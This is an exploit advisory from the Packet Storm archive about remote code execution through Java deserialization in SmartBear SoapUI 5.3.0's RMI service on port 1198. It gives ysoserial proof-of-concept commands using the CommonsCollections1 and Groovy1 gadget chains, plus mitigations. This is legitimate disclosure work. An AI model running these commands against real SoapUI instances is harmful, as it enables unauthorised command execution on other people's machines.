exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SmartBear SoapUI 5.3.0 Remote Code Execution Via Deserialization

SmartBear SoapUI 5.3.0 Remote Code Execution Via Deserialization
Posted Oct 5, 2017
Authored by Jakub Palaczynski

SmartBear SoapUI version 5.3.0 suffers from a remote code execution vulnerability via deserialization.

tags | exploit, remote, code execution
SHA-256 | 4cf0e4fc81ad8154903c5779e00dbb3afa5e22cf4b62e8c9face65c732b1a970

SmartBear SoapUI 5.3.0 Remote Code Execution Via Deserialization

Change Mirror Download
Title: SmartBear SoapUI - Remote Code Execution via Deserialization
Author: Jakub Palaczynski
Date: 12. July 2017

Exploit tested on:
==================
SoapUI 5.3.0
Also works on older versions.

Vulnerability:
**************

Remote Code Execution via Deserialization:
=================================

SoapUI by default listens on all interfaces on TCP port 1198 where you
can find SoapUI Integration (RMI) instance. SoapUI uses vulnerable
Java libraries (commons-collections-3.2.1.jar and
groovy-all-2.1.7.jar) which can be used to remotly execute commands
with permissions of user that started SoapUI.

Entry point:
Java RMI Registry on TCP port 1198
Vulnerable libraries used - commons-collections-3.2.1.jar and
groovy-all-2.1.7.jar

Proof of Concept:
Sample PoC using Commons Collections vulnerable library:
java -cp ysoserial-0.0.5-SNAPSHOT.jar
ysoserial.exploit.RMIRegistryExploit SOAPUI_IP 1198
CommonsCollections1 'ping OUR_IP'
Sample PoC using Groovy vulnerable library:
java -cp ysoserial-0.0.5-SNAPSHOT.jar
ysoserial.exploit.RMIRegistryExploit SOAPUI_IP 1198 Groovy1 'ping
OUR_IP'

Mitigations:
- bind SoapUI Integration instance to localhost if possible
- update all Java libraries that are known to be vulnerable:
commons-collections-3.2.1.jar
groovy-all-2.1.7.jar

Contact:
========
Jakub[dot]Palaczynski[at]gmail[dot]com


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close